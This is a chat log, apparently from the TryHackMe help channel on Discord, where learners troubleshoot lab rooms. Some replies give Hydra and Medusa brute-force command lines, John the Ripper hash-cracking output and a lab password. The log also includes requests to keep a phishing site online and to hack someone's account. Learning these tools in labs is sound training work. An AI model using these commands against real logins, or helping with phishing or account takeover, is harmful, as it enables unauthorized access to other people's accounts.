Hey guys. Does anyone know how I can get in touch with a THM rep? I have tried different ways, and I have a time-sensitive request. I can't start a VM. Getting an "Unauthorized" error everytime I try to start or terminate a VM. I can't progress, can't go back, nothing. On a minor note, I am about to lose my streak due to forced inactivity above.

abstract ginkgo
#

Hey. I'm working on Windows Threat Detection 2 and this is the 2nd time I've attemted this room. The malware in task 3 does not behave as expected, there is supposed to be process creation, but there aren't any that are even symilar to those shown in the walkthoughs I see posted online.

slim bison
torpid pulsar
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #347 - 28)

dreamy sphinx
#

Hello folks, I'm Tony

verbal ledge
#

Hello! I really need some help on Active Directory Basics. For the life of me I cannot get past task 4 despite following several tutorials. I've used RDP successfully via AttackBox (via command line and Remmina) and OpenVPN and can login as admin and phillip and change sophia's password (I've done all of this several times via multiple ways). But when I try to login as sophia I get hit with the error message "you must change your password before logging on the first time." I would attach a screenshot but for some reason that's not showing up as an option for me on this discord cri

vagrant fern
dull apexBOT
slim bison
idle sage
#

Hey THM, if the point of Metasploit exploitation is to teach anger, then congrats, you did the job well

#

Also, if the plan was to get a person mad at the AI, then congrats again

vagrant fern
shell cape
#

Hello I'm in hashing basics room for task 6 and I used hashcat. It told me that the estimated time to find the password for the first task is 10 hrs is this really true😭

signal vector
#

Hello. In the prompt defence room, under AI security -
The agent from whom we're supposed to extract the flag from simply gave it away after I typed "Hi". Is this by design?

analog heath
shell cape
signal vector
analog heath
#

use hashid online tools to identify hash.

rotund hollyBOT
#

Gave +1 Rep to @dull apex (current: #43 - 267)

shell cape
rotund hollyBOT
#

Gave +1 Rep to @analog heath (current: #452 - 19)

dusky wave
rotund hollyBOT
#

Gave +1 Rep to @vagrant fern (current: #11 - 944)

light hatch
#

Hi

formal prawn
#

Hey may I get some help please? im trying to use recon-ng theHarvester and google dork but I am really lost. Most of the commands doesn't work and I've tried useing the help command but I'm really confused

slim bison
rain finch
#

I just tried to check out the room that is in #announcements, and this is what I got:

verbal ledge
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #339 - 29)

verbal ledge
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #332 - 30)

meager sparrow
#

Hey, could i DM someone to help me a little bit on the Metasploit: Exploitation room?

earnest sun
meager sparrow
#

Oh, ok! So I was doing the Task 5 - exploitation. But when running the eternal blue payload it says the target is not vulnerable.

#

Sorry if this is a basic question, I'm a complete beginner just starting my journey into cybersecurity.

vagrant fern
meager sparrow
#

Oh, just act like I was never here

meager sparrow
rotund hollyBOT
#

Gave +1 Rep to @vagrant fern (current: #11 - 945)

earnest sun
shut jay
#

Hello guys I’m new here
Please I want to learn ethical hacking
Can anyone teach me

kindred loom
#

The Wazuh room does not work, I'm on task 4 last question, I'm trying to count the security events that have been generated by AGENT-001. I put in the date range and nothing appears. "Note: You will need to make sure that your time range includes the 11th of March 2022" this doesn't exactly tell you the time frame either. It just says include this time, it doesn't indicate whether it's the starting point or the end point.

ruby cradle
#

Hello guys,
In the room active directory basics the forth task it requires us to log in as the employee Phillip how do i do that?

torpid pulsar
ruby cradle
#

I am confused as like how do i exactly log in is this something i do inside the machine itself or what i saw the video he seems to do it with the attack box but i have followed him and it didn't work

torpid pulsar
#

What to do
Stay on the current Windows machine the room gives you
Press Ctrl + Alt + Delete
Choose Switch user
Log in with:
Username: THM\phillip
Password: Claire2008

If that doesn't work, try THM\phillip

If that doesn't work, just tell me exactly the problem you are having. I'll see what I can do

#

Got to go, so hope it works!

plush grove
#

What should I do? I'm starting in cybersecurity for the first time and I'm on the 'Intro to Defensive Security' task 4. It asks: 'What is the flag that you obtained?'. I need help, please. Thank you!

ruby cradle
rotund hollyBOT
#

Gave +1 Rep to @torpid pulsar (current: #1488 - 4)

deep burrow
plush grove
deep burrow
gleaming inlet
#

in active directory basics im trying to login as phillip

but the problem is the turorial doesnt indicate how

#

how i do that

odd basalt
#

I'm playing through the Ra 2 room and I can't figure out why my commands aren't working (I already looked at the walkthrough) and neither the DIG nor anything else seems to work. Is this a problem with me or the room and the host?

odd basalt
#

I connected the AttackBox and everything worked fine. I'd be very grateful if someone knowledgeable could tell me what's wrong on my machine (kali linux), how to adjust the configuration files, or anything else?🙏

tribal ocean
#

hi everyone! I'm new here, currently transitioning into Security Analyst role. I’m building hands-on skills through the Security Analyst learning path on TryHackMe. I’m excited to learn and connect with everyone!

hidden magnet
#

How Do I report a bug:
https://tryhackme.com/room/mitre
is linking to https://attack.mitre.org/matrices/enterprise/ Which is v19 (https://attack.mitre.org/versions/v19/matrices/enterprise/)

but the category in task 2 q1 (What Tactic does the Hide Artifacts technique belong to in the ATT&CK Matrix?) is expecting the category from v18 (https://attack.mitre.org/versions/v18/matrices/enterprise/) since "Defense Evasion" was renamed to "Stealth"

I cannot upload the screenshots I have taken here...

vagrant fern
dull apexBOT
vagrant fern
wise dune
charred mauve
#

i dont think it runs on the attackbox

wise dune
#

i see

charred mauve
#

its probably running on the machine attached to the room

wise dune
#

ovpn?

charred mauve
#

do u have alink to the room

wise dune
#

i dont have, its only attackbox

#

oh i got it its on Practical Exercise!

#

but it still the same... Unable to connect

charred mauve
wise dune
#

yes

charred mauve
#

have you tried this IP?

analog heath
# wise dune

what's the task? and are you trying to connect to openvas web?

#

then check on which port does openvas is running, and use that port, like http://127.0.0.1:9392/login/login.html

wise dune
#

but now even i cannot open tryhackme website

#

like loading ...

analog heath
wise dune
#

yes i can ping

analog heath
wise dune
#

others browser also same

#

clear doesnt work

analog heath
wise dune
#

only from Opera work

analog heath
wise dune
#

no

analog heath
#

and whats your operating system? windows or linux

wise dune
#

windows, vm linux

#

openvas can not on THM machine

#

is it on attackbox

smoky grail
#

working on metasploit exploitation, and when trying to run the wordslist, i keep getting this

I am trying on my home machine and verified that the filepath is right

analog heath
#

see, you typer ...metasploit/metasploitWordliistmetasploitWordlist... u wrote it 2 times so make sure your path is correct

analog heath
wise dune
#

attackbox openvas error

#

yes open

analog heath
analog heath
wise dune
analog heath
#

sudo systemctl start docker

wise dune
analog heath
wise dune
smoky grail
#

nah my path is correct

analog heath
smoky grail
#

it's got read for owner/user/group

#

just checked that too lol idk

#

i gotta go though ill troubleshoot morel ater

#

or just use the attack bot

wise dune
analog heath
wise dune
#

its done, complete

analog heath
#

its already there i think run sudo docker start openvas

#

@wise dune sudo docker start openvas and then follow url. right

#

if not terminate the machine and restart it.

wise dune
analog heath
analog heath
wise dune
#

yes

analog heath
# wise dune

u should do on the openvpn attached machine by split screen. terminate attackbox

#

when target machine starts it also provide this split screen VM right? there u have to do, it should work now 😉

wise dune
analog heath
#

sudo docker start openvas

wise dune
#

thank you so much!

frank geyser
#

Please, I'm stack here for 2 days now..
I tried:
from browser with mobile view on inspection mode.
with burp suit interseption to change the user-agent -? iphone or android
terminal: again to change the user -agent

cant find the solution 🙁

slim bison
meager sparrow
#

Hey, I am currently in the Blue room, task 1. The third question asks "What is this machine vulnerable to?". I figured that out with a nmap --script vuln scan but i was wondering if there is some better more effective method to do this?

boreal lotus
#

how can i practice splunk and log analysis?

frank geyser
slim bison
smoky grail
#

i keep getting this with john doesnt matter if i use the attack box or my machine. in the linux privesc room

#

on my machine not the thm vm

gaunt ruin
#

Hi this is md masud

slim bison
sleek bridge
#

is anyone else having trouble with the Windows browser machines? im trying to do the windows security monitoring module in the SOC level 1 learning path and every time the VM spins up with in 2 or 3 minutes the machine freezes. iv tried restarting the browser, closing through task manager and re opening. i have tried restarting my computer too. other VMs and rooms are working just fine its just in that specific room.

smoky grail
slim bison
smoky grail
#

im still an infant trying to learn to crawl when it comes to bash

slim bison
smoky grail
#

im getting better, but scripting has never been a strong skill for me. i'll be propping myself up and walking here soon

slim bison
#

ya don't skip bash basics, that knowledge gap will haunt you on everything your future self works with

smoky grail
#

yeah ive learned that much. i google and make a lot of notes on what im trying to do in bash

#

it doesnt help that at work i dont have a linux machine that forces me to continue using bash

#

but far too many tools at work depend on windows

#

sigh, john is still telling me that no hashes are loaded

#

it appears i didnt have john jumbo

slim bison
smoky grail
#

ubuntu. attackbox was also giving me the same thing saying that there was no hash

#

i just went through a whole process to get jumbo and it's still like lol nah

#

i mightve found it. there's a hidden $ at the end of the hash value in hash.txt

#

doesnt show up if i vim into the file

sullen tangle
#

hi

slim bison
smoky grail
#

Thank you for your help though

#

I really appreciate it

slim bison
# smoky grail I really appreciate it

all good - come back to the attackbox fresh another time, try using nano to save the hash you copy to clipboard, then sanity check it looks correct using cat, then use it with john

smoky grail
#

i struggle with nano, which is why i use vim lol

nocturne prism
#

hi

verbal seal
#

bro what

slim bison
# verbal seal bro what

link to room? looks like wrong target (port 80 vs 81) also, did u type the answer( hidden chars are a thing sometimes with copy-pasta)

verbal seal
#

it’s the newly released room called basic vulnerability identification and i will try that thx

tepid stump
#

hi all , starting today ethical hacking!

#

i had a little issue going trought the tutorials , could someone debug / help me out ?

tough sentinel
tepid stump
#

i'm at the Experience Cyber Security level stage2.py my VM gave me THM{ATTACK_F_OUND} but it doesnt fill the gap to answer right

tough sentinel
tepid stump
#

THM{ATTACK_FOUND} but goes like that

#

ok sry misunderstood the room

tough sentinel
tepid stump
#

yes that is the one actualy showing

#

Pre Security
Introduction to Cyber Security
Experience Cyber Security this is the path on the website

#

ok seems fixed ! thanks

tough sentinel
tepid stump
#

you too , seems also that maybe i did something wrong

#

HAGD

tough sentinel
rotund hollyBOT
#

Gave +1 Rep to @tepid stump (current: #3749 - 1)

thorn cosmos
#

Hi, I'm in the "Metasploit: Introduction" room, trying to run the EternalBlue exploit on the target machine, but it fails everytime, ending with "Exploit completed, but no session was created."

fading nimbus
#

Need help with room Custom Tooling using Burp Challenge

dim matrix
#

Hi, I'm in the rabbit store CTF room, and it's impossible for me to connect to the website (i tried with the attackbox and the VPN on my laptop) and waited 10/15 minutes before connecting. When i modify manually in the /etc/hosts i can access to the website but only the page a specificaly added to the hosts so it make no sense to me to add everything manually. Does someone have an idea ?

ashen crane
dim matrix
ashen crane
# dim matrix [IP-addr] cloudsite.thm

Then yeah, only pages under cloudsite.thm will render correctly

So if you want to request e.g. web.cloudsite.thm you need to add it to /etc/hosts as well

[IP-addr] cloudsite.thm web.cloudsite.thm

dim matrix
#

ohhh ok

#

because when i wanted to go to the login page nothing showed

ashen crane
dim matrix
#

secure.cloudsite.thm or something like that

ashen crane
dim matrix
#

ok ok but that's a bit strange the need of adding every webpage like that

ashen crane
dim matrix
rotund hollyBOT
#

Gave +1 Rep to @ashen crane (current: #46 - 260)

ashen crane
modest wolf
#

Anyone done( Elastic: Query Languages) room on TryHackMe?
I need a help

steep jacinth
#

Hey guys, m'm stuck on the 'Experience Cyber Security' room, Task 4 (Become a Defender). I can't find the flag or change it from account detected to Account Locked. I've tried a few times now and it's not working 🙁

gleaming oxide
gleaming oxide
gleaming oxide
steep jacinth
# gleaming oxide ...?

I don't know whats happen -VM gave me THM{ATTACK_F_OUND} but it doesnt fill the gap for the right answer and is not changing from account detected to account locked after following the instructions

gleaming oxide
#

Do you see No answer needed and the Check button?

steep jacinth
gleaming oxide
#

then you're not in task 4 of the room you linked...?

steep jacinth
gleaming oxide
#

what's the heading on Task4 and Task5?

steep jacinth
gleaming oxide
#

screenshot

charred mauve
#

i have the same, can it be that changes were made to the room?

still nimbus
#

I have a problem with the pyramid of pain, specifically the first question in task 6. I don't really understand what I should do, and I did look through walkthroughs, but they all ask about the browser. The question they ask now is different

nocturne onyx
#

Hey everyone, new here! Working on a project involving WordPress security and running into standard malware scanners that keep missing clouded and database-resident backdoors. Anyone here dealt with this before or built anything to tackle it?

primal pollen
#

why this if the salt its already on hash? im trying using john --format --wordlist hash.txt and i put a max and min length of 6.. but its take too long to get the password, somthing here that i dont see?

gleaming oxide
primal pollen
#

idk if this is normal

slim bison
robust whale
#

Yo

#

Can someone hack me back into my Roblox account

#

@primal pollen

slim bison
primal pollen
#

IS A cRACK THE HASH

slim bison
# primal pollen IS A cRACK THE HASH

ty- that's more like it sha512 about 70 sec for me

ms@Mac ~/Documents/THM/Splunkfun % john-gcc newhash --length=6 -w=/Users/ms/Downloads/seclists/rockyou.txt     [04-30-26 18:40:04]
Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the "--format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 ASIMD 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
waka99           (?)     
1g 0:00:01:09 DONE (2026-04-30 18:41) 0.01444g/s 9184p/s 9184c/s 9184C/s waman1..wa0563
Use the "--show" option to display all of the cracked passwords reliably

rotund hollyBOT
#

Gave +1 Rep to @primal pollen (current: #2437 - 2)

primal pollen
#

i put like this

john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt sg_hash.txt
and take 12min

slim bison
#

that's jumbo-john optimized for arm64 what CPU you using?

primal pollen
#

RX 570

#

i5

slim bison
#

there ya go - im just on faster harware is all - yours works just fine

primal pollen
#

ty so much bro

verbal seal
slim bison
slim bison
verbal seal
primal pollen
#

just wait?

slim bison
#

just let it run, touch grass, grab a coffee

primal pollen
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #325 - 32)

gleaming oxide
next cedar
#

Yo

#

Can some1 tell me how to keep my phising website like alive for long the tunnel i am doing with windows just keep changing link and cloudfare isn't working for me for some reason is there any way to keep it online for long I am using windows btw

abstract umbra
#

Hi, I'm stuck on the Burp Suite room - Q3 answer submission keeps giving 'There was a problem, please try again later.' My answer is yea but it won't submit. Can anyone help?

modest wolf
#

I need help with the (Elastic: Query Languages) room from Task 3 to Task 6.
Can anyone please guide me step by step or give some hints?

hollow orbit
hollow orbit
gleaming oxide
#

Howdy!
Having some issues with https://tryhackme.com/room/annie
Figured out the steps on my won, and when it didn't work, checked some walkthroughs... I had the right steps (||python2, ip/shellcode|| edits and everything), but it's still not working 🫠
Anyone available for a sniff-test? (is the box broken, or am I?)

fair sleet
#

hi,could you help me ı was trying to get verified but ı couldn understand what should ı dm the try hack me bot

primal pollen
#

windows servers VM its always a madness to keep connection =[

slim bison
celest mountain
#

I'm in need of help in the Linux 3 room. It is asking "When will the crontab on the deployed instance (10.65.148.200) run?" . When i try the command there are no processes listed, it just keeps showing the directions to edit. I tried ls -la /etc/cron* but i dont know which one would be the answer?

celest mountain
#

i did, but it would only show the instructions on how to edit cron

#

tryhackme@linux3:~$ crontab -l

Edit this file to introduce tasks to be run by cron.

Each task to run has to be defined through a single line

indicating with different fields when the task will be run

and what command to run for the task

To define the time you can provide concrete values for

minute (m), hour (h), day of month (dom), month (mon),

and day of week (dow) or use '*' in these fields (for 'any').

Notice that tasks will be started based on the cron's system

daemon's notion of time and timezones.

Output of the crontab jobs (including errors) is sent through

email to the user the crontab file belongs to (unless redirected).

For example, you can run a backup of all your user accounts

at 5 a.m every week with:

0 5 * * 1 tar -zcf /var/backups/home.tgz /home/

For more information see the manual pages of crontab(5) and cron(8)

m h dom mon dow command

@reboot /var/opt/processes.sh

pallid hare
#

im at burpsuite basics task 10 and i made a foxy proxy to try and get the flag while looking around the site...but whenever i enable the proxy the site will load endlessly i tried using echo but he couldnt generate a response the burps browser doesnt work aswell the proxy settings are like asked....127.0.0.1 on port 8080 but it doesnt work

celest mountain
#

Nevermind i figured out the answer

vale pivot
#

Hi guyz i'm rex , i just joind the server ! i'm really interested in learning about computers !

ashen crane
#

Don't forget to verify

dull apexBOT
tender lintel
#

Is it actually possible to complete the room "Lateral Movement and Pivoting"? Nearly every task involves going to za.tryhackme.com, but "za.tryhackme.com" doesn't exist

fast elm
#

I'm having the same problem lmaooo wth is going on

fast elm
tender lintel
fast elm
#

That should be going in your resolv file. You want your hosts file.

#

Here's mine for example

tepid stump
#

hey ! blobheart i had another issue on first question about lan in Pre Security
Network Fundamentals
Intro to LAN
it asks what lan stands for but it misses one letter to fill ion
in*
its missing the a of arena to be precise

fast elm
#

Those are the settings for the room directly after it but it's basically the same

tepid stump
#

yoo my bad it was area

#

i would have like local networks to fight in a arena i guess

tender lintel
vagrant fern
#

We don't encourage / tolerate this type of activity in this server. This is the dedicated forum of TryHackMe, a cybersecurity training platform.

merry plover
#

Hi, I'm having trouble with the Hydra Room - The victim VM doesn't seem to work, reset it a few times. Sometimes get a web prompt but nothing happens when I seen some text. Burp suite is up and seeing nothing coming back. What am I doing wrong here?

zenith ibex
#

hey i am new here and i am new to hacking , would want a learning pal to learn with ,

merry plover
#

Also having issues with Burp Suite: The Basics victim machine not loading up the target website

earnest sun
merry plover
earnest sun
#

If you just want to recon the website I'd suggest keeping Intercept to off and instead having a look in the HTTP History tab

merry plover
rotund hollyBOT
#

Gave +1 Rep to @earnest sun (current: #416 - 21)

earnest sun
#

I've been in exactly that situation myself when starting out with Burp 😅

regal summit
#

anyone use Medusa for brute force http module for web login ? it dosent match correct password from wordlist.txt or picks 1st one or 1st 5 if i use -t 5 ? any idea how to make it match password to username to pick correct one ?

#

i use the right command medusa -h www.example.com -u Name -P wordlists.txt -M http -f (for 1st corret pick to stop scan)

celest lantern
#

greetings

#

am new here and not know much about system please how can i locate Terminal

shut gull
#

Im in Linux Fundamental Part 3 on using the crontabs.

The question to answer is "When will the crontab on the deployed instance run?".

I dont even understand the question.

#

When I open the crontab using crontab -e, there isnt any commands in there on running any crons

#

Nvm, figured it out.

floral trench
#

how do we get access to #koth ? I am looking forward to start implementing the things I am currently learning during junior pen tester course else its purely theoretical .

gleaming oxide
cedar zodiac
#

hi, im karim, i hope you re all going well..... i got a problem with the 7 task in the room red team threat intel, i saw with "echo" to solve the problem but it look like i can do nothing more at my level, first exercice of maping task 7, red team threat intel.

analog heath
analog heath
cedar zodiac
#

thank you for your help

slim bison
regal summit
#

anyone use Medusa for brute force http module for web login ? it dosent match correct password from wordlist.txt or picks 1st one or 1st 5 if i use -t 5 ? any idea how to make it match password to username to pick correct one ?

#

Please anyone I be very thankful

slim bison
# regal summit Please anyone I be very thankful

sorry it's been yrs since i tried that tool - don't even remember why i stopped using it - i prefer hydra, burp intruder, Caido, etc - what i've learned is never get hung up on just one tool;)

slim bison
# regal summit anyone use Medusa for brute force http module for web login ? it dosent match co...

Medusa will usually brute-force combinations when you give it separate username/password lists, like:

-U users.txt -P wordlist.txt

That means it does not automatically treat line 1 of users.txt as matching line 1 of wordlist.txt.

If you want username/password pairs, use a combo file instead:

-C combos.txt

Format:

username:password
username2:password2
username3:password3

Example:

medusa -h TARGET -M http -C combos.txt -m DIR:/login -m FORM:"username=^USER^&password=^PASS^" -m DENY-SIGNAL:"Invalid"

Also check the failure/success matching carefully. If your DENY-SIGNAL or success condition is wrong, Medusa may report the first password or miss the correct one entirely. Run with verbose/debug output and test one known-good credential first.

torpid pulsar
#

Hey, on the room teaching Hydra basics (/room/hydra), does anyone know what wordlist I should be using? I am using the built in rockyou.txt, but depending on the password, I could be here for another 2 days straight! 😆

slim bison
torpid pulsar
torpid pulsar
slim bison
torpid pulsar
#

Not positively sure, but it looks like I tried 69914 different entries in 15 minutes.
[STATUS] 4660.93 tries/min, 69914 tries in 00:15h, 14274484 to do in 51:03h, 16 active

torpid pulsar
slim bison
#

hydra -v -I -l molly -P /Users/ms/Downloads/seclists/rockyou.txt 10.66.130.240 http-post-form "/login:username=^USER^&password=^PASS^:F=Your "

slim bison
torpid pulsar
slim bison
torpid pulsar
#

Thanks, the article was what I needed, but I don't know how to verify my account on the Discord Server

slim bison
torpid pulsar
#

Last question related to verifying: what part of the server do I run that one on? Or will it not go anywhere if I send. I don't want to post it on a public discord channel, due to the warning

slim bison
#

anywhere - its only visible to you

torpid pulsar
#

So, what do I do from here?

slim bison
#

sorry, i don't have the time to teach you dev tools or how to manually parse a request, this is foundational knowledge you must build by study and repetition, the tool assumes this base knowledge

torpid pulsar
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #315 - 33)

torpid pulsar
primal pollen
#

anyone could help me? im make this reverse_shell and send this to a ubuntu(target).. and a give the chmod +x

and on my machine i put the localhost, ports and set the payload for the OS target and run on my machine and run on the target.. but nothing happenits like both stay waiting for something

rocky jetty
#

Hi, I've been stuck for way too long on this Interceptor room, can anyone give me a clue?

feral knot
#

Hey guys, for the broken Res room, since xxd hasnt the suid bit set anymore, bruteforce the user password, he has ALL(ALL:ALL) ALL in sudo -l

gleaming oxide
dim aspen
timber drum
# gleaming oxide link, what have you tried

I'm stuck on this too. I've intercepted the response from api_login.php and changed the params to make it look like a success, but I can't get it to redirect it to the dashboard. Which, to be honest I would have thought I'd need an authenticated session cookie for

dim aspen
timber drum
#

Did you get logged in, or is that what you're stuck with too?

dim aspen
#

@rocky jetty go deeper in web emulation, the room notes will send you down a rabbit hole.

rocky jetty
dim aspen
rocky jetty
#

Hmm, alright alright alright, does it have anything to do with the phpmyadmin?

rocky jetty
rotund hollyBOT
#

Gave +1 Rep to @dim aspen (current: #1490 - 4)

floral trench
#

any rooms to learn to do start working on a project while learning junior pen test course ?

little jetty
#

Follow the THM roadmap towards penetration tester

cedar zodiac
#

Salam alkm

little jetty
cedar zodiac
#

Is there admin or support people here who can solve a problem on the website

little jetty
cedar zodiac
#

@little jetty you only speak or solve prblms too?

#

@little jetty thanks

rotund hollyBOT
#

Gave +1 Rep to @little jetty (current: #2438 - 2)

little jetty
cedar zodiac
#

@little jetty i actually have a problem to answer to the firs question of the 7 task in red teamer threat intel programme

#

I saw with the ai "echo" we gave me a lot of suggestion and i tryed to solve the problem

#

But no issue for the moment

#

I m starting in cyber and I speak usually french so that s not easy for me

#

Thanks for your consideration

little jetty
#

Je parle français aussi, if there's some help you need you can reach out

#

In DM

cedar zodiac
#

This is a about how to mapp ttp in Lockheed Martin ...

#

@little jetty thanks

rotund hollyBOT
#

Gave +1 Rep to @little jetty (current: #1840 - 3)

versed cairn
#

cant i get help with smb brute force with metasploitexploitation when i run the exploit i am getting couldnt not connect when i do manuelly from terminal it works just fine

thorn cosmos
#

Hi,
I'm in the Metasploit:exploitation room, task 5, using the eternalblue exploit to open a reverse shell to the target machine.
The exploit is a success and a session is opened with the reverse shell, but then the framework starts to open a new session every second, filling the console with new lines, and all I can do to stop is killing the attack machine.
After restarting the attack machine, the same exploit with the same payload to the same targets says the target is not vulnerable !
What the hell is going on ?

ashen crane
candid sable
#

Hey in "Phishing Analysis Tools" (Part of SOC L1) in task 3 it's asking me to use Talos reputation center to check the content category of malware-test[.]com
However, the site doesn't have a content category ("No established content categories") and this answer doesn't fit the blanks.

Edit: okay this probably is because Talos is having problems, e.g. https://www.talosintelligence.com/categories is giving me a 500 and it also can't tell me the category of google.com

vagrant fern
dull apexBOT
primal pollen
primal pollen
#

hydra -l admin -P /usr/share/wordlists/rockyou.txt bruteit.thm http-post-form "/admin/index.php:user^USER^&pass=^PASS^:F=Username or password invalid" -V

what is wrong in my command?

gleaming oxide
primal pollen
#

some easy rooms like this show me that im a dumb 🥲

gleaming oxide
# primal pollen some easy rooms like this show me that im a dumb 🥲

you can't speak? /s

With my write-ups, I have a noHints folder for the rooms completed without any peeks (there aren't that many in there).
When I'm stuck for more than a certain time on a box, I'll either take a walk, work on another box, or peek at a walkthrough (to validate my current rabbit-hole or redirect); when I peek I note a [cheat] tag in my notes.

As you get better, and see more of the unique techniques/issues, you'll see the number of [cheat] per box go down 💪 🚀

rotund hollyBOT
#

Gave +1 Rep to @gleaming oxide (current: #134 - 79)

gleaming oxide
# primal pollen ty, i'll do this

I came to the same hydra incantation as you, but the 16 first attempts all came back as success... 🙃
I used Caido's Automate feature to BF and it only took a few seconds 💪

thorn cosmos
#

In rooms with Ubuntu target machine in console mode, each time I switch to the attack machine then back, the target console is cleared and I lose everything. It's impossible to finish the room exercise when I have to switch multiple times between the two machines !
Is there a way to open the machines in two different browser tabs, so I can use them together ?

thorn cosmos
gleaming oxide
thorn cosmos
rotund hollyBOT
#

Gave +1 Rep to @gleaming oxide (current: #133 - 80)

twilit flame
#

I'm having difficulties with cewl in red team password attacks room:

root@ip-10-114-114-139:~# cewl -m 8 -w clinic.lst https://clinic.thmredteam.com
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
<internal:/root/.rbenv/versions/3.3.8/lib/ruby/3.3.0/rubygems/core_ext/kernel_require.rb>:136:in `require': cannot load such file -- cewl_lib (LoadError)
    from <internal:/root/.rbenv/versions/3.3.8/lib/ruby/3.3.0/rubygems/core_ext/kernel_require.rb>:136:in `require'
    from /usr/bin/cewl:42:in `<main>'
slim bison
twilit flame
slim bison
lunar ginkgo
#

Hey

twilit flame
#

I mean the issue

#

with cewl when I reinstalled it

slim bison
twilit flame
#

okay it worked thank you so much for your help! 🙏 and I'll report the bug

slim bison
gleaming oxide
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #311 - 34)

slim bison
red loom
#

Guys I have problem with romm Metasploit: Exploitation Task 5 with that question: What is the content of the flag.txt file? I don't know what to do. I am trying to fix it from 30 minutes.

slim bison
red loom
primal pollen
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #307 - 35)

slim bison
red loom
#

I am trying to find this file flag.txt but the command says no results from search

#

And I can't post screenshots

#

I don't know why

#

I saw why

#

Here is the screenshot

slim bison
red loom
#

Yea when I got a session I tried it too but it didn't do anything too

#

I don't know I am tired. I forgot how I created the session too so I am just going to try tomorrow again. Thanks for the help

slim bison
mortal basin
#

i am having trouble seeing the source code in the

#

I am having trouble seen the answer on the screen for the mock test. they are blurry and is not visible to read. This prevent me from completing the exercise. can you help. I try restarting logging out and refreshing the page but no luck

clever canopy
#

Hi i am new here , i am a beginner i want to be a ethical hacker what i have to learn please tell

red loom
haughty finch
#

hey yall, so I'm trying to complete the ret2libc room in tryhackme, but it seems like the VM it gives me has an improper pwntools installation. checksec exists but it spits out errors when I try to run it saying it can't find the pwnlib module. When I try to run my exploit it also told me It cant find pwntools. Is the room potentially broken? if so who should I ask about this

#

I tried changing VPN regions yet every machine I get has this exact problem @w@

#

also cant seem to reinstall pwntools, been stuck in this state for 30 minutes

#

ok it just poped this error, might be the network, but idk

high raft
haughty finch
high raft
#

you won't be able to "complete" the machine for thm but you can do it

haughty finch
#

yeah I've already done that luckly for testing, plus the challenge is similar to challenge 9 in pwn101 so I didn't really lose that much x3

high raft
haughty finch
#

tho if there isn't any that's alr too, currently studying from how2heap repo, just thought it would be nice if there were any

high raft
kind cedar
#

Hi

high raft
slim bison
# red loom

please read the Task directions carefully - you need to use Eternal Blue, not smb bruteforce

covert current
#

having trouble with Experience Cyber Security room, in the screenshots they have provided, flags has been intentionally blurred. Is there a VM that is suppose to start and reveal the flag or how it works?

ancient summit
#

having problems with Experience Cyber Security room, firefox doesnt seem to load and its been around 5 minutes.

weak agate
#

hi, i need help with SOC L1 Alert Triage Room at task 5 (alert triage)?

weak agate
ashen crane
weak agate
# ashen crane 1. What room 2. What task 3. What's exactly the issue 4. What did you try to fix...
  1. SOC L1 Alert Triage room
  2. Task 5: Alert Triage
  3. The issue is after editing the alert according to the priortisation, severity, status, veridct, assignee, analyst comments and saving it did not received the flags?
  4. They asked me questions where i need to fill in the flags from first priority alert to third priority alert, there was a hint and in the hint its written i just need to make the required changes in the alert and save it
weak agate
ashen crane
weak agate
dull apexBOT
viscid vault
#

is there a bug with the pickle rick room?

#

i solved the first question and the site reloaded and made the whole room completed for me

#

i only got 90 points while others got 240

slim bison
little creek
#

II'm having the same problem. Let me know how to fix it.

slim bison
#

The tilde (~) can be typed (from a mac or pc ) using Shift+tilde/backtick key (upper left just below esc key)🙂

cyan tree
#

Hello, under soc1 path: phishing analysis fundamentals, task 6, question 3 is asking for a defanged x-originating-ip; the answer format doesn't accept the defanged ip address of xxx [.] xxxx....etc.

grave stratus
#

Hey guys, how’s it going?
I’m currently studying web security (XSS, session hijacking) and starting to use Burp Suite in labs.
I’d like to focus more on the practical side now — does anyone recommend good TryHackMe rooms or paths for that?
Appreciate any guidance 🙏

deep burrow
#

I know windows event viewer is slow but on the windows VMs does anyone find it completely impossible ot use?

#

I'm doing the Windows Threat Detection labs and everytime i filter an event log the whol ething locks up

peak bluff
foggy abyss
#

Hi all on the CI/CD and Build Security room. Can't see the CI/CD adapter using ip a? Using the attack box..

weak agate
vagrant fern
gleaming oxide
gleaming oxide
gleaming oxide
gleaming oxide
cyan tree
gleaming oxide
ashen crane
foggy abyss
gleaming oxide
slate gull
#

hheyI am getting an error message, everything work fine if i use dir

#

here: gobuster vhost -u "http://10.64.179.125" --domain offensivetools.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain --exclude-length 250-320

slim bison
rotund hollyBOT
#

Gave +1 Rep to @gleaming oxide (current: #132 - 81)